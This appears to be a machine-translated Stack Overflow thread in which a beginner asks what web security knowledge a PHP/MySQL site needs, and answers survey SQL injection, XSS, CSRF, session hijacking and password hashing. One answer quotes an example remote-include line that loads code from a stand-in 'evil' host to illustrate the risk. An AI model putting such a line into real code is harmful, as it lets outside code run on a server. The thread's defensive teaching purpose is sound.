1
我正在編寫我的第一個php/mysql網站,並意識到我對安全知之甚少,超出了我在課程/書中學到的東西。在我能夠發佈自己的網站之前,我需要多少安全知識,而不必擔心獲得微薄的成功會吸引黑客並導致我的網站被破解?我需要多少網絡安全知識才能發佈我的網站?
如果它對更多細節有幫助,我將創建一個網站,允許用戶添加純文本內容以及瀏覽其他人添加的內容。該文本旨在存儲在數據庫中。
A
回答
1
查看SQL注入和XSS。這一切都在驗證用戶輸入。永遠不要相信用戶。
末到最好的學習方法是,因爲安全性差的進攻受到影響。然後你明白它是如何工作的。只有一個技巧,做備份。
+0
謝謝s.lenders - 我會去閱讀那些維基百科的文章ñ看看我學到了什麼! :) – gabrielg 2013-02-12 17:55:40
2
這永遠不夠。但你會希望繼續改進。當你準備好時,你可能會認識你自己。
瞭解最常見的安全問題,如:
- SQL注入
- 表單欺騙
- XSS
,並記住:
- 永遠的Valide用戶輸入(包括會話) 次
- 文件夾塊訪問,不應該是公共
- 使用河豚,而不是爲密碼
- 隱藏錯誤給最終用戶的MD5/SHA1(並記錄它們)
而且看看在this guide其中總結了最着名的安全問題。
+0
傑弗裏真的很有用 - 一個明確的答案,我應該引導我的注意力。我還不能投票答覆,但如果可以的話,我會投你一票。感謝您幫助newb! 此外,該指南非常好 - 我非常感謝鏈接! – gabrielg 2013-02-12 17:54:59
0
您網站中最關鍵的是用戶可以向您的數據庫提供文本。 在stackoverflow上閱讀此問題以獲得有關如何防止sql注入的良好答案。 How to prevent sql injection in php
+0
是的,好點 - 我們在課堂上討論了sql注入,所以當你和s.lenders指出時,我會更深入地研究這些注入。感謝你們對我的幫助! – gabrielg 2013-02-12 17:56:38
3
你什麼都不知道,所以它取決於你的代碼有哪些可能的攻擊媒介以及風險是什麼。
問自己:
- 我是否包括或讀取基於用戶輸入的文件嗎?然後你應該知道,爲什麼白名單很重要,流包裝的風險是什麼(即
include 'http://evil.example.com/hack.txt';)。請參閱:PHP - Is "include" function secure? - 是否根據用戶輸入輸出用戶生成的內容或內容?然後你應該知道什麼XSS(跨站腳本)是,以及如何防止它
- 我是否使用動態SQL查詢?然後,您應該知道SQL Injections是什麼以及如何預防它們。附註:不要再使用
mysql_函數。請參閱:The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead - 我是否使用會話?然後你應該知道Session Hijacking是什麼以及如何防止它。
- 我是否使用文件上傳?然後您應該知道securing file uploads(PDF鏈接)
- 我是否處理用戶密碼?然後你應該知道最先進的密碼哈希,即bcrypt。請參閱:How do you use bcrypt for hashing passwords in PHP?
- 我是否使用用戶特定的表單?那麼你應該知道CSRF(Cross Site Request Forgery)以及如何防止它
- 我是否使用發送郵件的表單?然後你應該知道關於Email Injection或者使用一個你知道有抵押的庫,如swiftmailer。
- 我可以使用任何形式嗎?然後不要用
PHP_SELF作爲它的動作,因爲XSS is also a possible attack on $_SERVER variables。
這個名單是不完整的,但應涵蓋簡單的Web應用中最常見的用例和他們的安全威脅
關於風險:只要你處理敏感個人資料,
的用戶或在自己的虛擬服務器上託管網站,您還有其他責任,因爲最糟糕的情況不再僅僅是您的網站可能被破壞,但私人數據可能會暴露,您的服務器可能會轉變爲垃圾郵件或更糟。
最重要的規則是:不要相信任何輸入的數據
的擴展,這個規則,重要初學者:究竟使用適合當前環境的措施。不要只是在用戶輸入一切,你知道並希望它會更安全,這是適得其反!我經常看到如下問題:「如果我在所有$ _POST變量上使用addslashes(mysql_real_escape_string(strip_tags(htmlspecialchars()))),我的應用程序是否安全?」 - 如果您甚至認爲這是一種有效的方法,那麼您對用戶輸入的安全性如何工作存在嚴重的誤解。我再說一遍:什麼是安全的,什麼不是,總是取決於上下文!
一個很好的資源,從學習是Open Web Application Security Project
+0
Fab非常出色,幫助我理解我學習的方向。我真的很感激你花時間寫出所有的細節,如果我可以投你的答案,我會的!我特別喜歡If'問題'然後學習'解決方案'格式! – gabrielg 2013-02-12 19:20:07
相關問題
- 1. 我不能再發布我的網站
- 2. 我需要安排我的知識
- 3. 我是否需要SSL證書才能將用戶發送到我的網站
- 4. 需要在我的網站
- 5. 我的網站的身份驗證和安全 - 需要諮詢
- 6. 我的媒體網站需要多少磁盤空間?
- 7. 我需要多少圖片來訓練深度神經網絡
- 8. 需要SSL證書才能連接到安全的網絡服務
- 9. 需要幫助:從我的網站發佈到Facebook頁面牆
- 10. 需要幫助讓我的網站發佈信息到Facebook牆
- 11. 我需要爲移動設備製作多少個網站
- 12. 我需要做什麼才能從本地網絡訪問我的WCF服務?
- 13. 我需要知道數據倉庫需要多少電子表格知識
- 14. 在本地網絡上發佈網站
- 15. 網絡有多不安全?
- 16. iphone安全的網絡標識
- 17. 使用java 3d的網站? (需要爲網絡開發3d)
- 18. 未安裝發佈所需的網絡發佈擴展
- 19. 網絡安全
- 20. 網絡安全
- 21. 我需要在PHP中從我的網站發送電子郵件。我怎樣才能做到這一點?
- 22. 用戶在我的網站上得到「網站不安全」
- 23. Groupon-like網站需要多少時間才能由經驗豐富的php開發人員開發?
- 24. 如果我實施網絡推送通知,我的個人網站上是否需要隱私政策?
- 25. 我怎樣才能阻止網站?
- 26. 我的網站需要HTML文件嗎?
- 27. 我需要訪問網絡路徑
- 28. 我需要幫助網絡抓取
- 29. 我需要msvcr100符號(內部網絡)
- 30. 從我的網站發佈的推特
「如何保護我的Web應用程序」是一個大的範圍來回答。基礎知識:使用準備好的sql語句,不要使用快速散列來存儲密碼,請使用'bcrypt'或類似的。 – Jon 2013-02-12 12:33:48
首先,你應該轉向https://www.owasp.org/index.php/Category:Attack,如果你正在閱讀一門課程/書籍,那麼你最有可能容易受到某些東西(SQL注入,XSS)的影響,因爲大部分他們的書沒有實現安全性,因爲它可能會讓學習者感到困惑。 – 2013-02-12 12:34:09
@Jon與非快速哈希相比,什麼是快速哈希?我正在考慮使用我讀過的sha-512。我應該使用bcrypt嗎?如果是這樣,你能解釋一下爲什麼嗎? – gabrielg 2013-02-12 17:39:03